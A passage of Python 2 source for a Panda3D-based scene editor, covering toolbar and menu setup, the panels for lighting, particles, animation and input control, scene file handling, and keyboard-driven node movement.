self.cTrav = CollisionTraverser()
base.cTrav = self.cTrav
for event in self.dataFlowEvents:
self.accept(event[0], event[1], extraArgs = event[2:])
self.actionEvents = [
# Scene graph explorer functions
['SGE_changeName', self.changeName],
['SGE_Properties', self.openPropertyPanel],
['SGE_Duplicate', self.duplicate],
['SGE_Remove', self.remove],
['SGE_Add Dummy', self.addDummyNode],
['SGE_Add Collision Object', self.addCollisionObj],
['SGE_Metadata', self.openMetadataPanel],
['SGE_Set as Reparent Target', self.setAsReparentTarget],
['SGE_Reparent to Target', self.reparentToNode],
['SGE_Animation Panel', self.openAnimPanel],
['SGE_Blend Animation Panel', self.openBlendAnimPanel],
['SGE_MoPath Panel', self.openMoPathPanel],
['SGE_Align Tool', self.openAlignPanel],
['SGE_Flash', self.flash],
['SGE_madeSelection', self.selectNode],
['select',self.selectNode],
['deselect', self.deSelectNode],
['se_selectedNodePath',self.selectFromScene],
['se_deselectedAll',self.deselectFromScene],
]
''' All messages starting with "SGE_" are generated in seSceneGraphExplorer'''
for event in self.actionEvents:
self.accept(event[0], event[1], extraArgs = event[2:])
camera.toggleVis()
self.selectNode(base.camera) ## Initially, we select camera as the first node...
def appInit(self):
#################################################################
# appInit(self)
# Initialize the application.
# This function will be called when you call AppShell's constructor
#################################################################
### Create SceneEditor Ver. DirectSession
self.seSession = SeSession()
self.seSession.enable()
SEditor.camera.setPos(0,-50,10)
self.placer=None
self.MopathPanel = None
self.alignPanelDict = {}
#self.quadview=QuadView()
self.lightingPanel = None
self.controllerPanel = None
self.particlePanel = None
### Create Side Window
self.sideWindow = sideWindow(worldColor = self.worldColor,
lightEnable = self.lightEnable,
ParticleEnable = self.ParticleEnable,
basedriveEnable = self.basedriveEnable,
collision = self.collision,
backface = self.backface,
texture = self.texture,
wireframe = self.wireframe,
grid = self.grid,
widgetVis = self.widgetVis,
enableAutoCamera = self.enableAutoCamera)
self.sideWindowCount = 1
self.sideWindow.selectPage()
messenger.send('SGE_Update Explorer',[render]) ## Update the Scene Graph
pass
def getPhotoImage(self,name):
modpath = ConfigVariableSearchPath("model-path")
path = modpath.findFile(Filename(name))
return PhotoImage(file=path.toOsSpecific())
def createInterface(self):
# The interior of the toplevel panel
interior = self.interior()
#######################################################
### Creating the Buttons in the window frame
#######################################################
buttonFrame = Frame(interior)
self.image=[]
self.image.append(self.getPhotoImage('models/icons/new.gif'))#0
self.image.append(self.getPhotoImage('models/icons/open.gif'))#1
self.image.append(self.getPhotoImage('models/icons/save.gif'))#2
self.image.append(self.getPhotoImage('models/icons/model.gif'))#3
self.image.append(self.getPhotoImage('models/icons/actor.gif'))#4
self.image.append(self.getPhotoImage('models/icons/placer.gif'))#5
self.image.append(self.getPhotoImage('models/icons/mopath.gif'))#6
self.image.append(self.getPhotoImage('models/icons/lights.gif'))#7
self.image.append(self.getPhotoImage('models/icons/particles.gif'))#8
self.image.append(self.getPhotoImage('models/icons/control.gif'))
self.image.append(self.getPhotoImage('models/icons/help.gif'))#9
self.image.append(self.getPhotoImage('models/icons/blank.gif'))
self.image.append(self.getPhotoImage('models/icons/blank.gif'))
self.image.append(self.getPhotoImage('models/icons/blank.gif'))
self.image.append(self.getPhotoImage('models/icons/blank.gif'))
self.image.append(self.getPhotoImage('models/icons/blank.gif'))
self.image.append(self.getPhotoImage('models/icons/blank.gif'))
self.image.append(self.getPhotoImage('models/icons/blank.gif'))
self.image.append(self.getPhotoImage('models/icons/blank.gif'))
self.image.append(self.getPhotoImage('models/icons/blank.gif'))
self.image.append(self.getPhotoImage('models/icons/blank.gif'))
self.image.append(self.getPhotoImage('models/icons/blank.gif'))
self.image.append(self.getPhotoImage('models/icons/blank.gif'))
i = 0
for element in self.image:
i += 1
button = Button(buttonFrame, image = element, command=lambda n=i : self.buttonPushed(n))
button.pack(fill=X, side = LEFT)
buttonFrame.pack(fill=X, side=LEFT,expand=True)
def buttonPushed(self, buttonIndex):
#################################################################
# buttonPushed(self, buttonNum)
# This function will handle all button events from top level window
# Take the button index as a reference to sence which button has been pushed.
#################################################################
####
#### Change here to process the button event further.
####
if buttonIndex==1: # New Scene
self.newScene()
return
elif buttonIndex==2: # Open Scene
self.openScene()
return
elif buttonIndex==3: # Save Scene
self.saveScene()
return
elif buttonIndex==4: # Load Model
self.loadModel()
return
elif buttonIndex==5: # Load Actor
self.loadActor()
return
elif buttonIndex==6: # Open Placer
self.openPlacerPanel()
return
elif buttonIndex==7: # Open Mopath Panel
self.openMoPathPanel()
return
elif buttonIndex==8: # Open Lighting Panel
self.openLightingPanel()
return
elif buttonIndex==9: # Open Particle Panel
self.openParticlePanel()
return
elif buttonIndex==10:
self.openInputPanel()
return
elif buttonIndex==11: # Help
self.showAbout()
return
elif buttonIndex==12:
print "You haven't defined the function for this Button, Number %d."%buttonIndex
return
elif buttonIndex==13:
print "You haven't defined the function for this Button, Number %d."%buttonIndex
return
elif buttonIndex==14:
print "You haven't defined the function for this Button, Number %d."%buttonIndex
return
elif buttonIndex==15:
print "You haven't defined the function for this Button, Number %d."%buttonIndex
return
elif buttonIndex==16:
print "Your scene will be eliminated within five seconds, Save your world!!!, Number %d."%buttonIndex
return
elif buttonIndex==17:
print "You haven't defined the function for this Button, Number %d."%buttonIndex
return
elif buttonIndex==18:
print "You haven't defined the function for this Button, Number %d."%buttonIndex
return
elif buttonIndex==19:
print "You haven't defined the function for this Button, Number %d."%buttonIndex
return
elif buttonIndex==20:
print "You haven't defined the function for this Button, Number %d."%buttonIndex
return
return
def createMenuBar(self):
# Creates default menus. Can be overridden or simply augmented
# Using button Add below
self.menuBar.addmenuitem('Help', 'command',
'Get information on application',
label='About...', command=self.showAbout)
## Creat stuff inside the "File"
self.menuBar.addmenuitem('File', 'command', 'Creat New Scene',
label='New Scene',
command=self.newScene)
self.menuBar.addmenuitem('File', 'command', 'Open a Scene',
label='Open Scene',
command=self.openScene)
self.menuBar.addmenuitem('File', 'command', 'Save a Scene',
label='Save Scene',
command=self.saveScene)
self.menuBar.addmenuitem('File', 'command', 'Save Scene as...',
label='Save as...',
command=self.saveAsScene)
self.menuBar.addmenuitem('File', 'separator')
self.menuBar.addmenuitem('File', 'command', 'Load Model',
label='Load Model',
command=self.loadModel)
self.menuBar.addmenuitem('File', 'command', 'Load Actor',
label='Load Actor',
command=self.loadActor)
self.menuBar.addmenuitem('File', 'separator')
self.menuBar.addmenuitem('File', 'command', 'Import a Scene',
label='Import...',
command=self.importScene)
self.menuBar.addmenuitem('File', 'separator')
self.menuBar.addmenuitem('File', 'command', 'Quit this application',
label='Exit',
command=self.quit)
## Creat "Edit" on the menu and its stuff
self.menuBar.addmenu('Edit', 'Editting tools')
self.menuBar.addmenuitem('Edit', 'command', 'Un-do',
label='Undo...',
command=self.unDo)
self.menuBar.addmenuitem('Edit', 'command', 'Re-do',
label='Redo...',
command=self.reDo)
self.menuBar.addmenuitem('Edit', 'separator')
self.menuBar.addmenuitem('Edit', 'command', 'Deselect nodepath',
label='Deselect',
command=self.deSelectNode)
self.menuBar.addmenuitem('Edit', 'separator')
self.menuBar.addmenuitem('Edit', 'command', 'Add a Dummy',
label='Add Dummy',
command=self.addDummy)
self.menuBar.addmenuitem('Edit', 'command', 'Duplicate nodepath',
label='Duplicate',
command=self.duplicateNode)
self.menuBar.addmenuitem('Edit', 'command', 'Remove the nodepath',
label='Remove',
command=self.removeNode)
self.menuBar.addmenuitem('Edit', 'command', 'Show the object properties',
label='Object Properties',
command=self.showObjProp)
self.menuBar.addmenuitem('Edit', 'separator')
self.menuBar.addmenuitem('Edit', 'command', 'Show the Camera setting',
label='Camera Setting',
command=self.showCameraSetting)
self.menuBar.addmenuitem('Edit', 'command', 'Render setting',
label='Render Setting',
command=self.showRenderSetting)
## Creat "Panel" on the menu and its stuff
self.menuBar.addmenu('Panel', 'Panel tools')
self.menuBar.addmenuitem('Panel', 'command', 'Open Side Window',
label='Side Window',
command=self.openSideWindow)
self.menuBar.addmenuitem('Panel', 'command', 'Placer Panel',
label='Placer Panel',
command=self.openPlacerPanel)
self.menuBar.addmenuitem('Panel', 'command', 'Animation Panel',
label='Animation Panel',
command=self.openAnimationPanel)
self.menuBar.addmenuitem('Panel', 'command', 'Motion Path Panel',
label='Mopath Panel',
command=self.openMopathPanel)
self.menuBar.addmenuitem('Panel', 'command', 'Lighting Panel',
label='Lighting Panel',
command=self.openLightingPanel)
self.menuBar.addmenuitem('Panel', 'command', 'Particle Panel',
label='Particle Panel',
command=self.openParticlePanel)
self.menuBar.addmenuitem('Panel', 'separator')
self.menuBar.addmenuitem('Panel', 'command', 'Input control Panel',
label='Input device panel',
command=self.openInputPanel)
self.menuBar.pack(fill=X, side = LEFT)
## get "Menu" items in order to control the entry status
self.menuFile = self.menuBar.component('File-menu')
self.menuEdit = self.menuBar.component('Edit-menu')
self.menuPanel = self.menuBar.component('Panel-menu')
## Disable entries when user doesn't select anything
if not self.isSelect:
self.menuEdit.entryconfig('Deselect', state=DISABLED)
self.menuEdit.entryconfig('Add Dummy', state=DISABLED)
self.menuEdit.entryconfig('Duplicate', state=DISABLED)
self.menuEdit.entryconfig('Remove', state=DISABLED)
self.menuEdit.entryconfig('Object Properties', state=DISABLED)
self.menuPanel.entryconfig('Animation Panel', state=DISABLED)
self.menuPanel.entryconfig('Side Window', state=DISABLED)
def onDestroy(self, event):
#################################################################
# If you have open any thing, please rewrite here!
#################################################################
if taskMgr.hasTaskNamed('seMonitorSelectedNode'):
taskMgr.remove('seMonitorSelectedNode')
pass
def closeAllSubWindows(self):
#################################################################
# closeAllSubWindows(self)
# except side window. this function will close all sub window if there is any.
#################################################################
if self.lightingPanel != None:
self.lightingPanel.quit()
if self.placer != None:
self.placer.quit()
if self.MopathPanel != None:
self.MopathPanel.quit()
if self.particlePanel != None:
self.particlePanel.quit()
if self.controllerPanel != None:
self.controllerPanel.quit()
list = self.animPanel.keys()
for index in list:
self.animPanel[index].quit()
list = self.animBlendPanel.keys()
for index in list:
self.animBlendPanel[index].quit()
list = self.propertyWindow.keys()
for index in list:
self.propertyWindow[index].quit()
list = self.alignPanelDict.keys()
for index in list:
self.alignPanelDict[index].quit()
self.animPanel.clear()
self.animBlendPanel.clear()
self.propertyWindow.clear()
self.alignPanelDict.clear()
return
## Processing message events
def makeDirty(self):
self.Dirty=1
def removeLight(self, lightNode):
#################################################################
# removeLight(self, lightNode)
# This function will be called when user try to remove the light from lightingPanel
# (by sending out the message)
# So, in here we will call dataHolder(AllScene) to remove the light
# and return a list contains the newest data of lights in he scene.
# Then, this function will reset the lighting list in the lightingPanel
#################################################################
list = AllScene.removeObj(lightNode)
if self.lightingPanel != None:
self.lightingPanel.updateList(list)
return
def lightRename(self,oName, nName):
#################################################################
# lightRename(self,oName, nName)
# This function will be called when user try to rename the light from lightingPanel
# (by sending out the message)
# So, in here we will call dataHolder(AllScene) to rename the light
# and return a list contains the newest data of lights in he scene.
# Then, this function will reset the lighting list in the lightingPanel
#################################################################
list, lightNode = AllScene.rename(oName, nName)
if self.lightingPanel != None:
self.lightingPanel.updateList(list,lightNode)
return
def lightSelect(self,lightName):
#################################################################
# lightSelect(self,lightName)
# This function will be called when user try to select the light from lightingPanel
# (by sending out the message)
# So, in here we will call dataHolder(AllScene) to get the target light node
# Then, this function will put this light node back into lighting
# panel and update the data on the panel.
#################################################################
lightNode = AllScene.getLightNode(lightName)
if self.lightingPanel != None:
self.lightingPanel.updateDisplay(lightNode)
return
def addLight(self, type):
#################################################################
# addLight(self, type)
# This function will be called when user try to add a light from lightingPanel
# (by sending out the message)
# So, in here we will call dataHolder(AllScene) to create a default light node
# by the type that user assigned.
# Then, this function will put this light node back into lighting
# panel with the newest lighting list and update the data on the panel.
#################################################################
list, lightNode = AllScene.createLight(type = type)
if self.lightingPanel != None:
self.lightingPanel.updateList(list,lightNode)
self.makeDirty()
return
def lightingPanelClose(self):
#################################################################
# lightingPanelClose(self)
# This function will be called when user try to close the lighting panel
# This function will re-config the state of the lighting panel button on the top screen
# And it will set the self.lightingPanel to None
#################################################################
self.menuPanel.entryconfig('Lighting Panel', state=NORMAL)
self.lightingPanel = None
return
def openPropertyPanel(self, nodePath = None):
#################################################################
# openPropertyPanel(self, nodePath = None)
# This function will be called when user try to open a property window
# for one specific node in the scene.
# Here we will call dataHolder to get the basic properties
# we would like to let user to see and cange.
# And then we pass those information into propertyWindow
#################################################################
type, info = AllScene.getInfoOfThisNode(nodePath)
name = nodePath.getName()
if not self.propertyWindow.has_key(name):
self.propertyWindow[name] = propertyWindow(nodePath, type,info )
pass
def closePropertyWindow(self, name):
if self.propertyWindow.has_key(name):
del self.propertyWindow[name]
return
def openMetadataPanel(self,nodePath=None):
print nodePath
self.MetadataPanel=MetadataPanel(nodePath)
pass
def duplicate(self, nodePath = None):
#################################################################
# duplicate(self, nodePath = None)
# This function will be called when user try to open the duplication window
#################################################################
print '----Duplication!!'
if nodePath != None:
self.duplicateWindow = duplicateWindow(nodePath = nodePath)
pass
def remove(self, nodePath = None):
#################################################################
# remove(self, nodePath = None)
# This function will be called when user try to delete a node from scene
#
# For safty issue,
# we will do deselect first then remove the certain node.
#
#################################################################
if nodePath==None:
if self.nodeSelected == None:
return
nodePath = self.nodeSelected
self.deSelectNode()
if AllScene.isLight(nodePath.getName()):
self.removeLight(nodePath)
else:
AllScene.removeObj(nodePath)
pass
def addDummyNode(self, nodepath = None):
#################################################################
# addDummyNode(self, nodepath = None)
# This function will be called when user try to create a dummy node into scene
#
# Here we will call dataHolder to create a dummy node
# and reparent it to the nodePath that user has assigned.
#
#################################################################
AllScene.addDummyNode(nodepath)
self.makeDirty()
pass
def addCollisionObj(self, nodepath = None):
#################################################################
# addCollisionObj(self, nodepath = None)
# This function will be called when user try to create a collision object into the scene
#
# Here we will call collisionWindow to ask user what kind of collision objects they want to have.
# Then, send the information and generated collision object to dataHolder to finish the whole process
# and reparent it to the nodePath that user has assigned.
#
#################################################################
self.collisionWindow = collisionWindow(nodepath)
pass
def setAsReparentTarget(self, nodepath = None):
#################################################################
# setAsReparentTarget(self, nodepath = None)
# This function will be called when user select a nodePaht
# and want to reparent other node under it. (Drom side window pop-up nemu)
#################################################################
SEditor.setActiveParent(nodepath)
return
def reparentToNode(self, nodepath = None):
#################################################################
# reparentToNode(self, nodepath = None)
# This function will be call when user try to reparent a node to
# that node he selected as a reparent target before.
#
# The whole reparent process is handled by seSession,
# which is tunned from DirectSession
#
#################################################################
SEditor.reparent(nodepath, fWrt = 1)
return
def openPlacerPanel(self, nodePath = None):
#################################################################
# openPlacerPanel(self, nodePath = None)
# This function will be call when user try to open a placer panel.
# This call will only success if there is no other placer panel been activated
#################################################################
if(self.placer==None):
self.placer = Placer()
self.menuPanel.entryconfig('Placer Panel', state=DISABLED)
return
def closePlacerPanel(self):
#################################################################
# closePlacerPanel(self)
# This function will be called when user close the placer panel.
# Here we will reset the self.placer back to None.
# (You can think this is just like a reference count)
#################################################################
self.placer = None
self.menuPanel.entryconfig('Placer Panel', state=NORMAL)
return
def openAnimPanel(self, nodePath = None):
#################################################################
# openAnimPanel(self, nodePath = None)
# This function will be called when user tries to open an Animation Panel
# This will generated a panel and put it
# into a dictionary using the actor's name as an index.
# So, if there already has an animation panel for the target actor,
# it won't allow user to open another one.
#################################################################
name = nodePath.getName()
if AllScene.isActor(name):
if self.animPanel.has_key(name):
print '---- You already have an animation panel for this Actor!'
return
else:
Actor = AllScene.getActor(name)
self.animPanel[name] = seAnimPanel.AnimPanel(aNode=Actor)
pass
def openMoPathPanel(self, nodepath = None):
#################################################################
# openMoPathPanel(self, nodepath = None)
# This function will open a Motion Path Recorder for you.
#################################################################
if self.MopathPanel == None:
self.MopathPanel = MopathRecorder()
pass
def mopathClosed(self):
self.MopathPanel = None
return
def changeName(self, nodePath, nName):
#################################################################
# changeName(self, nodePath, nName)
# This function will be called when user tries to change the name of the node
#################################################################
oName = nodePath.getName() # I need this line in order to check the obj name in the control panel.
AllScene.rename(nodePath,nName)
# reset the list in the controller panel if it has been opened.
if (self.controllerPanel) != None:
list = AllScene.getAllObjNameAsList()
self.controllerPanel.resetNameList(list = list, name = oName, nodePath = nodePath)
return
# Take care things under File menu
def newScene(self):
#################################################################
# newScene(self)
# This function will clear whole stuff in the scene
# and will reset the application title to "New Scene"
#################################################################
self.closeAllSubWindows() ## Close all sub window
if(self.CurrentFileName):
currentF=Filename(self.CurrentFileName)
self.CurrentFileName=None
AllScene.resetAll()
currentModName=currentF.getBasenameWoExtension()
# Let us actually remove the scene from sys modules... this is done because every scene is loaded as a module
# And if we reload a scene python wont reload since its already in sys.modules... and hence we delete it
# If there is ever a garbage colleciton bug..this might be a point to look at
if sys.modules.has_key(currentModName):
del sys.modules[currentModName]
print sys.getrefcount(AllScene.theScene)
del AllScene.theScene
else:
AllScene.resetAll()
self.parent.title('Scene Editor - New Scene')
pass
def openScene(self):
#################################################################
# openScene(self)
#################################################################
# In the future try and provide merging of two scenes
if(self.CurrentFileName or self.Dirty):
saveScene = tkMessageBox._show("Load scene","Save the current scene?",icon = tkMessageBox.QUESTION,type = tkMessageBox.YESNOCANCEL)
if (saveScene == "yes"):
self.saveScene()
elif (saveScene == "cancel"):
return
self.closeAllSubWindows() ## Close all sub window
if(self.CurrentFileName):
currentF=Filename(self.CurrentFileName)
AllScene.resetAll()
currentModName=currentF.getBasenameWoExtension()
# Let us actually remove the scene from sys modules... this is done because every scene is loaded as a module
# And if we reload a scene python wont reload since its already in sys.modules... and hence we delete it
# If there is ever a garbage colleciton bug..this might be a point to look at
if sys.modules.has_key(currentModName):
del sys.modules[currentModName]
print sys.getrefcount(AllScene.theScene)
del AllScene.theScene
else:
AllScene.resetAll()
self.CurrentFileName = AllScene.loadScene()
if(self.CurrentFileName==None):
return
thefile=Filename(self.CurrentFileName)
thedir=thefile.getFullpathWoExtension()
print "SCENE EDITOR::" + thedir
self.CurrentDirName=thedir
if self.CurrentFileName != None:
self.parent.title('Scene Editor - '+ Filename.fromOsSpecific(self.CurrentFileName).getBasenameWoExtension())
if self.lightingPanel !=None:
lightList=AllScene.getList()
self.lightingPanel.updateList(lightList)
messenger.send('SGE_Update Explorer',[render])
# Close the side window in order to reset all world settings to fit the scene we have loaded.
self.sideWindow.quit()
# Try to re-open the side window again
while self.sideWindow == None:
wColor = base.getBackgroundColor()
self.worldColor[0] = wColor.getX()
self.worldColor[1] = wColor.getY()
self.worldColor[2] = wColor.getZ()
self.worldColor[3] = wColor.getW()
self.lightEnable = 1
self.ParticleEnable = 1
self.collision = 1
self.openSideWindow()
def saveScene(self):
#################################################################
# saveScene(self)
# If this is an open file call saveAsScene
# or else instantiate FileSaver from seFileSaver.py and pass it the filename
# If this filename exists in sys.modules you cannot use it
#################################################################
if(self.CurrentFileName):
f=FileSaver()
f.SaveFile(AllScene,self.CurrentFileName,self.CurrentDirName,1)
self.Dirty=0
else:
self.saveAsScene()
pass
def saveAsBam(self):
fileName = tkFileDialog.asksaveasfilename(filetypes = [("BAM",".bam")],title = "Save Scenegraph as Bam file")
theScene=render.find("**/Scene")
if not theScene is None:
theScene.writeBamFile(fileName)
else:
render.writeBamFile(fileName+".bad")
print " Scenegraph saved as :" +str(fileName)
def loadFromBam(self):
fileName = tkFileDialog.askopenfilename(filetypes = [("BAM",".bam")],title = "Load Scenegraph from Bam file")
if not fileName is None:
d=path(fileName)
scene=loader.loadModel(d.relpath())
scene.reparentTo(render)
def saveAsScene(self):
#################################################################
# saveAsScene(self)
# Ask for filename using a file save dialog
# If this filename exists in sys.modules you cannot use it
# Instantiate FileSaver from seFileSaver.py and pass it the filename
#################################################################
fileName = tkFileDialog.asksaveasfilename(filetypes = [("PY","py")],title = "Save Scene")
if(not fileName):
return
fCheck=Filename(fileName)
#print fCheck.getBasenameWoExtension()
###############################################################################
# !!!!! See if a module exists by this name... if it does you cannot use this filename !!!!!
###############################################################################
if(sys.modules.has_key(fCheck.getBasenameWoExtension())):
tkMessageBox.showwarning(
"Save file",
"Cannot save with this name because there is a system module with the same name. Please resave as something else."
)
return
self.CurrentDirName=fileName
fileName=fileName+".py"
f=FileSaver()
self.CurrentFileName=fileName
f.SaveFile(AllScene,fileName,self.CurrentDirName,0)
self.Dirty=0
self.parent.title('Scene Editor - '+ Filename.fromOsSpecific(self.CurrentFileName).getBasenameWoExtension())
pass
def loadModel(self):
#################################################################
# loadModel(self)
# This function will be called when user tries to load a model into the scene.
# Here we will pop-up a dialog to ask user which model file should be loaded in.
# Then, pass the path to dataHolder to load the model in.
#################################################################
modelFilename = askopenfilename(
defaultextension = '.egg',
filetypes = (('Egg Files', '*.egg'),
('Bam Files', '*.bam'),
('All files', '*')),
initialdir = '.',
title = 'Load New Model',
parent = self.parent)
if modelFilename:
self.makeDirty()
if not AllScene.loadModel(modelFilename, Filename.fromOsSpecific(modelFilename)):
print '----Error! No Such Model File!'
pass
def loadActor(self):
#################################################################
# loadActor(self)
# This function will be called when user tries to load an Actor into the scene.
# Here we will pop-up a dialog to ask user which Actor file should be loaded in.
# Then, pass the path to dataHolder to load the Actor in.
#################################################################
ActorFilename = askopenfilename(
defaultextension = '.egg',
filetypes = (('Egg Files', '*.egg'),
('Bam Files', '*.bam'),
('All files', '*')),
initialdir = '.',
title = 'Load New Actor',
parent = self.parent)
if ActorFilename:
self.makeDirty()
if not AllScene.loadActor(ActorFilename, Filename.fromOsSpecific(ActorFilename)):
print '----Error! No Such Model File!'
pass
def importScene(self):
self.makeDirty()
print '----God bless you Please Import!'
pass
## Take care those things under Edit nemu
def unDo(self):
pass
def reDo(self):
pass
def deSelectNode(self, nodePath=None):
#################################################################
# deSelectNode(self, nodePath=None)
# This function will deselect the node which we have selected currently.
# This will also remove the monitor task which monitor selected object's
# position, orientation and scale each frame.
#################################################################
if nodePath != None:
self.seSession.deselect(nodePath)
if self.isSelect:
self.isSelect = False
#if self.nodeSelected != None:
# self.nodeSelected.hideBounds()
self.nodeSelected =None
self.menuEdit.entryconfig('Deselect', state=DISABLED)
self.menuEdit.entryconfig('Add Dummy', state=DISABLED)
self.menuEdit.entryconfig('Duplicate', state=DISABLED)
self.menuEdit.entryconfig('Remove', state=DISABLED)
self.menuEdit.entryconfig('Object Properties', state=DISABLED)
if self.sideWindowCount==1:
self.sideWindow.SGE.deSelectTree()
if taskMgr.hasTaskNamed('seMonitorSelectedNode'):
taskMgr.remove('seMonitorSelectedNode')
return
pass
def addDummy(self):
#################################################################
# addDummy(self)
# This function will do nothing but call other function
# to add a dummy into the scene.
#
# Ok... this is really redundancy...
#
#################################################################
self.addDummyNode(self.nodeSelected)
pass
def duplicateNode(self):
#################################################################
# duplicateNode(self)
# This function will do nothing but call other function
# to open the duplication window.
#
# Ok... this is really redundancy...
#
#################################################################
if self.nodeSelected!=None:
self.duplicate(self.nodeSelected)
pass
def removeNode(self):
#################################################################
# removeNode(self)
# This function will do nothing but call other function
# to remove the current selected node..
#
# Ok... this is really redundancy...
#
################################################################
self.remove(self.nodeSelected)
pass
def showObjProp(self):
################################################################
# showObjProp(self)
# This function will do nothing but call other function
# to open the property window of current selected node..
#
# Ok... this is really redundancy...
#
################################################################
self.openPropertyPanel(self.nodeSelected)
pass
def showCameraSetting(self):
################################################################
# showCameraSetting(self)
# This function will do nothing but call other function
# to open the property window of camera..
#
# Ok... this is really redundancy...
#
################################################################
self.openPropertyPanel(camera)
pass
def showRenderSetting(self):
'''Currently, no idea what gonna pop-out here...'''
pass
## Take care those thins under Edit nemu
def openSideWindow(self):
################################################################
# openSideWindow(self)
# This function will open the side window and set the reference number
# so that we can make sure there won't have two or more side windows in the same time.
################################################################
if self.sideWindowCount==0:
self.sideWindow = sideWindow(worldColor = self.worldColor,
lightEnable = self.lightEnable,
ParticleEnable = self.ParticleEnable,
basedriveEnable = self.basedriveEnable,
collision = self.collision,
backface = self.backface,
texture = self.texture,
wireframe = self.wireframe,
grid = self.grid,
widgetVis = self.widgetVis,
enableAutoCamera = self.enableAutoCamera)
self.sideWindowCount = 1
self.menuPanel.entryconfig('Side Window', state=DISABLED)
return
def openAnimationPanel(self):
################################################################
# openAnimationPanel(self)
# This function will do nothing but call other function
# to open the animation window for selected node(if it is an Actor)..
#
# Ok... this is really redundancy...
#
################################################################
if AllScene.isActor(self.nodeSelected):
self.openAnimPanel(self.nodeSelected)
pass
def openMopathPanel(self):
################################################################
# openMopathPanel(self)
# This function will create a Motion Path Recorder
################################################################
MopathPanel = MopathRecorder()
pass
def toggleParticleVisable(self, visable):
################################################################
# toggleParticleVisable(self, visable)
# This function will be called each time user has toggled
# the check box of Particle visibility in the side window.
# The reason we keep track this is because
# we have to know we should show/hide the model on the new-created particle
################################################################
self.ParticleEnable = visable
AllScene.toggleParticleVisable(visable)
return
def openLightingPanel(self):
################################################################
# openLightingPanel(self)
# open the lighting panel here.
# If there is already exist a lighting panel, then do nothing
################################################################
if self.lightingPanel==None:
self.lightingPanel = lightingPanel(AllScene.getLightList())
self.menuPanel.entryconfig('Lighting Panel', state=DISABLED)
return
def addParticleEffect(self,effect_name,effect,node):
AllScene.particleDict[effect_name]=effect
AllScene.particleNodes[effect_name]=node
if not self.ParticleEnable:
AllScene.particleNodes[effect_name].setTransparency(True)
AllScene.particleNodes[effect_name].setAlphaScale(0)
AllScene.particleNodes[effect_name].setBin("fixed",1)
return
def openParticlePanel(self):
if self.particlePanel != None:
## There already has a Particle panel!
return
if(len(AllScene.particleDict)==0):
self.particlePanel=seParticlePanel.ParticlePanel()
else:
for effect in AllScene.particleDict:
theeffect=AllScene.particleDict[effect]
self.particlePanel=seParticlePanel.ParticlePanel(particleEffect=theeffect,effectsDict=AllScene.particleDict)
pass
def closeParticlePanel(self):
self.particlePanel = None
return
def openInputPanel(self):
if self.controllerPanel==None:
list = AllScene.getAllObjNameAsList()
type, dataList = AllScene.getControlSetting()
self.controllerPanel = controllerWindow(listOfObj = list, controlType = type, dataList = dataList)
pass
def closeInputPanel(self):
self.controllerPanel = None
return
def requestObjFromControlW(self, name):
################################################################
# requestObjFromControlW(self, name)
# Call back function
# Each time when user selects a node from Control Panel,
# this function will be called.
# This function will get the actual nodePath from dataHolder and then
# set it back into controller panel
################################################################
node = AllScene.getObjFromSceneByName(name)
if (self.controllerPanel) != None and (node!=None):
self.controllerPanel.setNodePathIn(node)
return
def setControlSet(self, controlType, dataList):
if controlType == 'Keyboard':
self.controlTarget = dataList[0]
self.keyboardMapDict.clear()
self.keyboardMapDict = dataList[1].copy()
self.keyboardSpeedDict.clear()
self.keyboardSpeedDict = dataList[2].copy()
return
def startControl(self, controlType, dataList):
if not self.enableControl:
self.enableControl = True
else:
# Stop the current control setting first
# Also this will make sure we won't catch wrong keyboard message
self.stopControl(controlType)
self.enableControl = True
self.setControlSet(controlType, dataList)
self.lastContorlTimer = globalClock.getFrameTime()
if controlType == 'Keyboard':
self.controlType = 'Keyboard'
self.keyControlEventDict = {}
self.transNodeKeyboard = self.controlTarget.attachNewNode('transformNode')
self.transNodeKeyboard.hide()
for index in self.keyboardMapDict:
self.keyControlEventDict[index] = 0
self.accept(self.keyboardMapDict[index], lambda a = index:self.keyboardPushed(a))
self.accept(self.keyboardMapDict[index]+'-up', lambda a = index:self.keyboardReleased(a))
return
def stopControl(self, controlType):
if not self.enableControl:
return
if controlType == 'Keyboard':
self.enableControl = False
for index in self.keyboardMapDict:
self.ignore(self.keyboardMapDict[index])
self.ignore(self.keyboardMapDict[index]+'-up')
taskMgr.remove("KeyboardControlTask")
self.transNodeKeyboard.removeNode()
return
def keyboardPushed(self, key):
self.keyControlEventDict[key] = 1
if not taskMgr.hasTaskNamed("KeyboardControlTask"):
self.keyboardLastTimer = globalClock.getFrameTime()
taskMgr.add(self.keyboardControlTask, "KeyboardControlTask")
return
def keyboardReleased(self, key):
self.keyControlEventDict[key] = 0
for index in self.keyControlEventDict:
if self.keyControlEventDict[index] == 1:
return
if taskMgr.hasTaskNamed("KeyboardControlTask"):
taskMgr.remove("KeyboardControlTask")
return
def keyboardControlTask(self, task):
newTimer = globalClock.getFrameTime()
delta = newTimer - self.keyboardLastTimer
self.keyboardLastTimer = newTimer
pos = self.controlTarget.getPos()
hpr = self.controlTarget.getHpr()
scale = self.controlTarget.getScale()
self.transNodeKeyboard.setPosHpr((self.keyControlEventDict['KeyRight']*self.keyboardSpeedDict['SpeedRight']-self.keyControlEventDict['KeyLeft']*self.keyboardSpeedDict['SpeedLeft'])*delta,
(self.keyControlEventDict['KeyForward']*self.keyboardSpeedDict['SpeedForward']-self.keyControlEventDict['KeyBackward']*self.keyboardSpeedDict['SpeedBackward'])*delta,
(self.keyControlEventDict['KeyUp']*self.keyboardSpeedDict['SpeedUp']-self.keyControlEventDict['KeyDown']*self.keyboardSpeedDict['SpeedDown'])*delta,
(self.keyControlEventDict['KeyTurnLeft']*self.keyboardSpeedDict['SpeedTurnLeft']-self.keyControlEventDict['KeyTurnRight']*self.keyboardSpeedDict['SpeedTurnRight'])*delta,
(self.keyControlEventDict['KeyTurnUp']*self.keyboardSpeedDict['SpeedTurnUp']-self.keyControlEventDict['KeyTurnDown']*self.keyboardSpeedDict['SpeedTurnDown'])*delta,
(self.keyControlEventDict['KeyRollLeft']*self.keyboardSpeedDict['SpeedRollLeft']-self.keyControlEventDict['KeyRollRight']*self.keyboardSpeedDict['SpeedRollRight'])*delta)
newPos = self.transNodeKeyboard.getPos(self.controlTarget.getParent())
newHpr = self.transNodeKeyboard.getHpr(self.controlTarget.getParent())
overAllScale = self.keyControlEventDict['KeyScaleUp']*self.keyboardSpeedDict['SpeedScaleUp']-self.keyControlEventDict['KeyScaleDown']*self.keyboardSpeedDict['SpeedScaleDown']
